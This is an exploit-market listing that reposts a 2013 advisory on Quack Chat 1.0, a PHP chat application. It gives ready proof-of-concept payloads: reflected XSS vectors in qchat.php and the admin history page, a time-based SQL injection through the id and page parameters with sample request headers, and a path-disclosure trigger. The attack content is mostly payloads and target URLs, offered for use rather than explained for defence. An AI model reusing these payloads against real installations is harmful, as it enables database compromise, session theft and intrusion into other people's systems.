[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Quack Chat 1.0 - Multiple Vulnerabilities

Author
Dylan Irzi
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-21125
Category
web applications
Date add
18-08-2013
Platform
php
###########################################################################################
# Exploit Title: Quack Chat 1.0 - XSS / SQL Injection / Path Diclosure
# Date: 15 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://www.quack-chat.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.0
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev.
###########################################################################################
 
Cross Site Scripting:
Archivos Afectados Afectados
 
qchat.php
qc_admin/index.php?p=history
 
PoC:
localhost/qchat.php
Vector: ""><img src=x onerror=prompt(/XSS/);>>
 
Input:
<input id="name" type="text" style="width:200px;" name="name">
Is Reflected: localhost/qc_admin/index.php?p=history
 
PoC #2:
localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)
Example:
localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E
 
-------------------------------------------------------------------
SQL Injection
 
localhost/qc_admin/index.php?p=history&id=(SQL Injection)
localhost/qc_admin/index.php?p=history&page=(SQL Injection)
 
# Exploit-DB note: Here's a PoC:
# <server>/qc_admin/index.php?p=history&id=1 and sleep(10)
 
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e
 
(Remplazar por una Session Cookie Valida)
 
-------------------------------------------------------------------
Path Diclosure
 
localhost/qc_admin/index.php?p=history&id='
 
in /var/www/chat/qc_admin/index.php on line 249
 
--------------------------------------------------------------------
 
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.

#  0day.today [2024-12-25]  #